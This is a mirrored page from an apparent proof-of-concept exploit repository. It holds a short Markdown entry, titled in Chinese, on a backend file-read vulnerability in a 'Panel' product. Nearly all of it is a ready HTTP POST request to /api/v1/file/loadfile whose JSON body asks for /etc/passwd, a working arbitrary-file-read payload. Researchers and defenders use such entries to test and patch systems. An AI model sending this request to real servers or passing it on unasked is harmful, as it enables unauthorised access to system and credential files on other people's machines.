mirror of
https://github.com/wooluo/POC00.git
synced 2026-03-17 22:44:52 +08:00
6 lines
101 B
Markdown
6 lines
101 B
Markdown
|
|
## Panel loadfile 后台文件读取漏洞
|
||
|
|
```
|
||
|
|
POST /api/v1/file/loadfile
|
||
|
|
{"paht":"/etc/passwd"}
|
||
|
|
```
|